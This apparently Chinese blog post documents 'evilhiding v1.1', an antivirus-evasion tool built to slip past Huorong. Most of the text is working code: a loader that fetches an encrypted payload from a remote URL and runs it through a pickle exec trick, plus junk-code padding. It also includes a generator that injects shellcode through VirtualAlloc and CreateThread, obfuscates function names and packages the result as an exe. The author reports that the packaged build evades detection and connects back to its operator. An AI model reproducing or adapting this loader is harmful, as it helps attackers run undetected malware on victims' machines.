记一次有趣的免杀探索

文章目录

前记

evilhiding昨天被提issue不能绕过火绒了,于是今天更新了evilhiding v1.1,已经可以继续免杀了。

期待各位的stars,项目地址如下:

复制代码
https://github.com/coleak2021/evilhiding

查杀排查

直接python运行b.py发现未被查杀,且可正常上线,但是通过pyinstaller打包为exe后发现被火绒查杀,因此打算对源代码进行修改来绕过火绒

于是对b.py关键部分分别打包检查,发现均未被查杀

加载器

复制代码
import pickle,base64,requests,ctypes
from cryptography.fernet import Fernet

url=''
def O7867890(sectr):
    KEY=b'Lo8QurfIObo62aKQsQjnzAocsnrrIkTsJewRJLLKAsA='
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))

    ret = pickle.dumps(A())
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

执行器

复制代码
def O1674418():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7867890(r.text)
    else:
        pass

if __name__ == '__main__':
    exec(t1)
    exec(t2)
    O1674418()

花指令

复制代码
t2 ="""
import base64

st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
   """

t1 ="""
import random

def O4402217(test_arr, low, high):
   i = (low - 1)  
   pivot = test_arr[high]

   for j in range(low, high):
       if test_arr[j] <= pivot:
           i = i + 1
           test_arr[i], test_arr[j] = test_arr[j], test_arr[i]

   test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1]
   return i + 1


def O7313740(test_arr, low, high):
   if low < high:
       pi = O4402217(test_arr, low, high)
       O7313740(test_arr, low, pi - 1)
       O7313740(test_arr, pi + 1, high)


test_arr= []
for i in range(59999):
   test_arr.append(random.random())
n= len(test_arr)
O7313740(test_arr,0, n - 1)
   """

得出结论:各部分可以分别正常打包,但是火绒对整体进行了特征提取,因此我们只需要将文件结构做修改即可

源码修改

经过测试,最终对b.py修改为如下,此时打包为exe可绕过火绒正常上线

复制代码
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random

url=''
def O7867890(sectr):
    KEY=b''
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))
        def say_hello(self):
            exec(bbb)
    a=A()
    a.say_hello()
    ret = pickle.dumps(a)
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

bbb ="""
import base64
st= 'cccccccccccccccccccooooooooooollllllllllllleeeeeeeeeeeeaaaaaaaaaaaakkkkkkkkk'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
   """

def O1674418():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7867890(r.text)
    else:
        pass

if __name__ == '__main__':
    O1674418()

因此,对main.py生成器修改如下

复制代码
# -*- coding: utf-8 -*-

import base64
import re,os,time
from cryptography.fernet import Fernet

shellcode = b""
url=''
key = Fernet.generate_key()
fernet = Fernet(key)
enstr = fernet.encrypt(shellcode)
key2 = Fernet.generate_key()
fernet2 = Fernet(key2)
a=f'''
import ctypes
from cryptography.fernet import Fernet
KEY={key}
fernet=Fernet(KEY)
shellcode=fernet.decrypt({enstr})

shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
'''

cccc=f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
url=f'{url}'
a=[]
class B():
    def cc(self):
        for i in range(5):
            a.append(i)

def O7303771(sectr):
    global destr
    KEY={key2}
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    aaa(destr)

def aaa(destr):
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))
        def O6294286(self):
            exec(bbb)
    a=A()
    a.O6294286()
    ret = pickle.dumps(a)
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

bbb ="""
for i in range(100):
    aaa=B()
    aaa.cc()
   """

def O0135984():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7303771(r.text)
    else:
        pass
if __name__ == '__main__':
    O0135984()
'''

def hunxiao():
    openfile = 'content.txt'
    text = open(openfile, encoding='utf-8').read()
    wd_df = re.findall("def (.*?)\\(", text)
    wd_df = list(set(wd_df))
    for i in wd_df:
        if i[0:2] == "__":
            wd_df.remove(i)
        if i == 'super':
            wd_df.remove(i)
    idlist = []
    for i in wd_df:
        idlist.append('O' + str(hash(i))[-7:])

    cs = len(wd_df)
    if cs == len(set(idlist)):
        while cs > 0:
            cs -= 1
            text = text.replace(wd_df[cs] + '(', idlist[cs] + '(')
            text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs])
            text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs])
            text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs])
    else:
        print('hash repeat')

    file_save = open('b.py', 'w', encoding='utf-8')
    file_save.write(text)
    file_save.close()

with open('content.txt', 'bw') as f:
    f.write(cccc.encode())
    hunxiao()

with open('a.txt', 'bw') as f:
    f.write(fernet2.encrypt(a.encode()))

with open('content.txt', 'br') as f:
    content=base64.b64encode(f.read())

b = f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
cccc={content}
exec(base64.b64decode(cccc).decode())
'''

with open('b.py', 'w', encoding='utf-8') as f:
    f.write(b)

iconame=f'{int (time.time() *1000)}.ico'
with open('coleak.ico',"br") as f:
    cont=f.read()
with open(f'{iconame}',"bw") as f:
    cont+=iconame.encode()
    f.write(cont)
with open('create.py',"br") as f:
    createit=f.read()
exec(createit)

免杀效果测试


相关推荐
try2find1 小时前
安装llama-cpp-python踩坑记
开发语言·python·llama
hanniuniu132 小时前
AI时代API挑战加剧,API安全厂商F5护航企业数字未来
人工智能·安全
zhulangfly2 小时前
API接口安全-1:身份认证之传统Token VS JWT
安全
博观而约取2 小时前
Django ORM 1. 创建模型(Model)
数据库·python·django
李洋-蛟龙腾飞公司2 小时前
HarmonyOS NEXT应用元服务常见列表操作分组吸顶场景
linux·运维·windows
码农垦荒笔记3 小时前
Git 安装闭坑指南(仅 Windows 环境)
windows·git
时时三省3 小时前
【时时三省】vectorcast使用教程
安全·安全架构
精灵vector3 小时前
构建专家级SQL Agent交互
python·aigc·ai编程
Zonda要好好学习4 小时前
Python入门Day2
开发语言·python
阿幸软件杂货间4 小时前
Windows 10 2016 长期服务版
windows·系统·win10